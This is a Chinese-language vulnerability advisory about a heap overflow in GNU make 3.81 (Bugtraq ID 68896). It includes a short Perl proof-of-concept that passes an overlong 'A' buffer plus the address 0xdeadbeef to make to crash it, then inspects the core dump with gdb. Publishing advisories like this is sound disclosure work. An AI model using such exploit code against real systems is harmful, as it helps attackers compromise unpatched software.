GNU Make指针间接引用堆溢出漏洞


发布日期:2014-07-14
更新日期:2014-07-28

受影响系统:
GNU make 3.81
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 68896
 
GNU Make是根据源代码自动构建可执行程序和库的实用程序。
 
Make 3.81及其他版本在实现上存在堆溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。
 
<*来源:HyP
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl

 use 5.010;
 use strict;
 use warnings;
 say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
 sleep 0.5;


 my $buff = "A"x 4096 ;
 my $addr = "\xef\xbe\xad\xde";
 my $make = "./make";
 my $gdb = "gdb --core core";
 my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);

 my $exec= qx($make $PAYLOAD);

 say " Reading Core file GDB ";
 sleep 0.5;

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
GNU
 ---
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.gnu.org

本文永久更新链接地址:

相关内容